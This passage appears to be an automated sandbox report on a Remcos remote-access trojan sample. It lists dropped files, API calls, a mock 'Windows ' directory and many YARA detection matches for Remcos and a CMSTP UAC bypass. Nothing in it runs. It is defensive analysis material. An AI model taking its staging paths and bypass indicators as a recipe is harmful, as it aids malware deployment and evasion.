                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFCode function: 19_2_02C57A2A NtAllocateVirtualMemory,19_2_02C57A2A
                Source: C:\Users\Public\alpha.pifCode function: 7_2_00044C10: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPAX@Z,memset,CreateFileW,DeviceIoControl,memcpy,CloseHandle,??_V@YAXPAX@Z,memset,??_V@YAXPAX@Z,FindClose,??_V@YAXPAX@Z,7_2_00044C10
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02CA8788 CreateProcessAsUserW,0_2_02CA8788
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_032167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,11_2_032167EF
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 21_2_02E967EF ExitWindowsEx,LoadLibraryA,GetProcAddress,21_2_02E967EF
                Source: C:\Users\Public\alpha.pifFile created: C:\WindowsJump to behavior
                Source: C:\Users\Public\alpha.pifFile created: C:\Windows \SysWOW64Jump to behavior
                Source: C:\Users\Public\alpha.pifFile deleted: C:\Windows \SysWOW64
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02C920C40_2_02C920C4
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02D3671B0_2_02D3671B
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02D3E42F0_2_02D3E42F
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02D4E5FA0_2_02D4E5FA
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02D3E9BE0_2_02D3E9BE
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02D6A93B0_2_02D6A93B
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02D64FD90_2_02D64FD9
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02D4AF670_2_02D4AF67
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02D3F0670_2_02D3F067
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02D3F1D00_2_02D3F1D0
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02D351830_2_02D35183
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02D556AC0_2_02D556AC
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02D6B7690_2_02D6B769
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02D5547D0_2_02D5547D
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02D2B5950_2_02D2B595
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02D55B380_2_02D55B38
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02D558DB0_2_02D558DB
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02D5D8000_2_02D5D800
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02D4FD800_2_02D4FD80
                Source: C:\Users\Public\alpha.pifCode function: 7_2_0004540A7_2_0004540A
                Source: C:\Users\Public\alpha.pifCode function: 7_2_00044C107_2_00044C10
                Source: C:\Users\Public\alpha.pifCode function: 7_2_000548757_2_00054875
                Source: C:\Users\Public\alpha.pifCode function: 7_2_000474B17_2_000474B1
                Source: C:\Users\Public\alpha.pifCode function: 7_2_000491447_2_00049144
                Source: C:\Users\Public\alpha.pifCode function: 7_2_0006695A7_2_0006695A
                Source: C:\Users\Public\alpha.pifCode function: 7_2_000641917_2_00064191
                Source: C:\Users\Public\alpha.pifCode function: 7_2_0004EE037_2_0004EE03
                Source: C:\Users\Public\alpha.pifCode function: 7_2_00047A347_2_00047A34
                Source: C:\Users\Public\alpha.pifCode function: 7_2_00046E577_2_00046E57
                Source: C:\Users\Public\alpha.pifCode function: 7_2_00063E667_2_00063E66
                Source: C:\Users\Public\alpha.pifCode function: 7_2_0004D6607_2_0004D660
                Source: C:\Users\Public\alpha.pifCode function: 7_2_00055A867_2_00055A86
                Source: C:\Users\Public\alpha.pifCode function: 7_2_0006769E7_2_0006769E
                Source: C:\Users\Public\alpha.pifCode function: 7_2_00053EB37_2_00053EB3
                Source: C:\Users\Public\alpha.pifCode function: 7_2_00054EC17_2_00054EC1
                Source: C:\Users\Public\alpha.pifCode function: 7_2_00046B207_2_00046B20
                Source: C:\Users\Public\alpha.pifCode function: 7_2_000507407_2_00050740
                Source: C:\Users\Public\alpha.pifCode function: 7_2_00050BF07_2_00050BF0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0323E34B11_2_0323E34B
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_032533AB11_2_032533AB
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0324627011_2_03246270
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0323E11C11_2_0323E11C
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0321F18B11_2_0321F18B
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_032381E811_2_032381E8
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_032541D911_2_032541D9
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0321400511_2_03214005
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0323706A11_2_0323706A
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0323876811_2_03238768
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_032387F011_2_032387F0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0323756611_2_03237566
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0323E5A811_2_0323E5A8
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0322742E11_2_0322742E
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0321DBF311_2_0321DBF3
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0324DA4911_2_0324DA49
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_03227AD711_2_03227AD7
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0323797E11_2_0323797E
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_032339D711_2_032339D7
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_03226E9F11_2_03226E9F
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_03235EEB11_2_03235EEB
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0323DEED11_2_0323DEED
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_03237DB311_2_03237DB3
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_03227C4011_2_03227C40
                Source: C:\Users\Public\alpha.pifCode function: 15_2_0004540A15_2_0004540A
                Source: C:\Users\Public\alpha.pifCode function: 15_2_00044C1015_2_00044C10
                Source: C:\Users\Public\alpha.pifCode function: 15_2_0005487515_2_00054875
                Source: C:\Users\Public\alpha.pifCode function: 15_2_000474B115_2_000474B1
                Source: C:\Users\Public\alpha.pifCode function: 15_2_0004914415_2_00049144
                Source: C:\Users\Public\alpha.pifCode function: 15_2_0006695A15_2_0006695A
                Source: C:\Users\Public\alpha.pifCode function: 15_2_0006419115_2_00064191
                Source: C:\Users\Public\alpha.pifCode function: 15_2_0004EE0315_2_0004EE03
                Source: C:\Users\Public\alpha.pifCode function: 15_2_00047A3415_2_00047A34
                Source: C:\Users\Public\alpha.pifCode function: 15_2_00046E5715_2_00046E57
                Source: C:\Users\Public\alpha.pifCode function: 15_2_00063E6615_2_00063E66
                Source: C:\Users\Public\alpha.pifCode function: 15_2_0004D66015_2_0004D660
                Source: C:\Users\Public\alpha.pifCode function: 15_2_00055A8615_2_00055A86
                Source: C:\Users\Public\alpha.pifCode function: 15_2_0006769E15_2_0006769E
                Source: C:\Users\Public\alpha.pifCode function: 15_2_00053EB315_2_00053EB3
                Source: C:\Users\Public\alpha.pifCode function: 15_2_00054EC115_2_00054EC1
                Source: C:\Users\Public\alpha.pifCode function: 15_2_00046B2015_2_00046B20
                Source: C:\Users\Public\alpha.pifCode function: 15_2_0005074015_2_00050740
                Source: C:\Users\Public\alpha.pifCode function: 15_2_00050BF015_2_00050BF0
                Source: C:\Users\Public\xpha.pifCode function: 16_2_000F1E2616_2_000F1E26
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFCode function: 19_2_02C420C419_2_02C420C4
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFCode function: 19_2_02C4C95F19_2_02C4C95F
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 21_2_02EC627021_2_02EC6270
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 21_2_02ED33AB21_2_02ED33AB
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 21_2_02EBE34B21_2_02EBE34B
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 21_2_02EB706A21_2_02EB706A
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 21_2_02E9400521_2_02E94005
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 21_2_02EB81E821_2_02EB81E8
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 21_2_02ED41D921_2_02ED41D9
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 21_2_02E9F18B21_2_02E9F18B
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 21_2_02EBE11C21_2_02EBE11C
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 21_2_02EB87F021_2_02EB87F0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 21_2_02EA742E21_2_02EA742E
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 21_2_02EBE5A821_2_02EBE5A8
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 21_2_02EB756621_2_02EB7566
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 21_2_02EA7AD721_2_02EA7AD7
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 21_2_02ECDA4921_2_02ECDA49
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 21_2_02E9DBF321_2_02E9DBF3
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 21_2_02EB39D721_2_02EB39D7
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 21_2_02EB797E21_2_02EB797E
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 21_2_02EB5EEB21_2_02EB5EEB
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 21_2_02EBDEED21_2_02EBDEED
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 21_2_02EA6E9F21_2_02EA6E9F
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 21_2_02EA7C4021_2_02EA7C40
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 21_2_02EB7DB321_2_02EB7DB3
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: String function: 02CA894C appears 56 times
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: String function: 02C944DC appears 74 times
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: String function: 02CA89D0 appears 45 times
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: String function: 02C946D4 appears 244 times
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: String function: 02C94860 appears 949 times
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: String function: 02C94500 appears 33 times
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: String function: 02D4C400 appears 45 times
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 03202093 appears 50 times
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 03234801 appears 41 times
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 02E82093 appears 50 times
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 02EB4801 appears 41 times
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 03201E65 appears 34 times
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 03234E70 appears 54 times
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 02EB4E70 appears 54 times
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 02E81E65 appears 34 times
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFCode function: String function: 02C5894C appears 50 times
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFCode function: String function: 02C446D4 appears 155 times
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFCode function: String function: 02C44860 appears 683 times
                Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 652
                Source: nft438A5fN.exeBinary or memory string: OriginalFilename vs nft438A5fN.exe
                Source: nft438A5fN.exe, 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs nft438A5fN.exe
                Source: nft438A5fN.exe, 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs nft438A5fN.exe
                Source: nft438A5fN.exe, 00000000.00000003.1592952655.000000003A563000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs nft438A5fN.exe
                Source: nft438A5fN.exe, 00000000.00000002.1655641681.000000003960E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs nft438A5fN.exe
                Source: nft438A5fN.exe, 00000000.00000003.1592952655.000000003A534000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs nft438A5fN.exe
                Source: nft438A5fN.exe, 00000000.00000003.1477595760.000000007FC9F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs nft438A5fN.exe
                Source: nft438A5fN.exe, 00000000.00000002.1670762206.000000007FAB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs nft438A5fN.exe
                Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs nft438A5fN.exe
                Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs nft438A5fN.exe
                Source: nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs nft438A5fN.exe
                Source: nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs nft438A5fN.exe
                Source: nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs nft438A5fN.exe
                Source: nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs nft438A5fN.exe
                Source: nft438A5fN.exe, 00000000.00000002.1613117060.0000000002395000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs nft438A5fN.exe
                Source: nft438A5fN.exe, 00000000.00000002.1655641681.0000000039626000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs nft438A5fN.exe
                Source: nft438A5fN.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                Source: 33.2.SndVol.exe.3290000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 33.2.SndVol.exe.3290000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 33.2.SndVol.exe.3290000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 33.2.SndVol.exe.3290000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 33.2.SndVol.exe.3290000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 33.2.SndVol.exe.3290000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 21.2.colorcpl.exe.2e80000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 21.2.colorcpl.exe.2e80000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 21.2.colorcpl.exe.2e80000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 11.2.colorcpl.exe.3200000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 11.2.colorcpl.exe.3200000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 11.2.colorcpl.exe.3200000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 21.2.colorcpl.exe.2e80000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 21.2.colorcpl.exe.2e80000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 21.2.colorcpl.exe.2e80000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 11.2.colorcpl.exe.3200000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 11.2.colorcpl.exe.3200000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 11.2.colorcpl.exe.3200000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 0.2.nft438A5fN.exe.2c90000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0.2.nft438A5fN.exe.2c90000.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 00000000.00000002.1666471917.000000007E810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
